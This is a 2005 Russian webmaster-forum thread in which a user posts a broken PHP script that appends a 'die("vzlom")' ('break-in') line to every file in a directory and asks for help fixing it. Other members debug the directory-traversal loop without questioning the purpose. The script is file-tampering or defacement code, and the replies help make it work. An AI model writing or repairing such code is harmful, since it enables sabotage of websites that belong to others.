форум вебмастероff на AlfaSpace.NET |
Ubuntu и Linux
|реактивный бесплатный хостинг
| Киноклуб. ВСЁ БЕСПЛАТНО!
база знаний хостинга
|
правила форума
| Начало ° Ответить ° Статистика ° Опрос ° Регистрация ° Поиск ° FAQ ° |
| Форум вебмастеров на AlfaSpace.NET / The Matrix Has You / Помогите найти ошибку.... |
| Автор | Сообщение |
| acsid Alfa Guru 2388 |
# Дата: 28 Окт 2005 15:47 ° Поправил: acsid <?php $string="<?php die('vzlom'); ?>";/*строка*/ $dir=Array();/*массив директорий,в которые надо дописывать*/ $dir[0]="data/"; for($i=0;$i<sizeof($dir);$i++) { $open=opendir($dir[$i]);/*открываем каждую папочку из массива*/ while($d=readdir($open))/*просматриваем папку из массива*/ { if(is_file($d))/*если проходимый нами в данный момент елемент-файл,то...*/ { $f=fopen($dir.$d,"a+");/*открываем каждый файлик из диретории для добавления*/ fputs($string,$fp);/*кладем в него строку*/ fclose($f);/*закрываем файлик*/ } } } ?> Не работает... Где ошибка? ![]() |
| WarGot Per aspera ad astra 1928 |
# Дата: 28 Окт 2005 17:08 acsid Возможно я туплю но где тут условие ? if(is_file($d))/ |
| acsid Alfa Guru 2388 |
# Дата: 29 Окт 2005 01:41 WarGot а мля точняк ...а как сделать условие на пхп формат? |
| SapienS Участник 760 |
# Дата: 29 Окт 2005 04:31 WarGot, да тупишь
if(is_file($d)) Условие - если выражение true (то есть $d - файл), то выполнять дальше |
| SapienS Участник 760 |
# Дата: 29 Окт 2005 04:34 acsid Ошибка с обходом диры! Читай следующий пример <?php if ($handle = opendir('/path/to/files')) { echo "Directory handle: $handle\n"; echo "Files:\n"; /* Это корректный способ цикла по директории. */ while (false !== ($file = readdir($handle))) { echo "$file\n"; } /* Это НЕПРАВИЛЬНЫЙ способ цикла по директории. */ while ($file = readdir($handle)) { echo "$file\n"; } closedir($handle); } ?> Ясно???? |
| WarGot Per aspera ad astra 1928 |
# Дата: 29 Окт 2005 05:52 ° Поправил: WarGot SapienS Гы, я просто так условия никогда не описывал, у мя всё конкретно
Спасибо, буду на будующее знать ![]() |
| acsid Alfa Guru 2388 |
# Дата: 29 Окт 2005 06:40 SapienS ясно ща поправлю |
|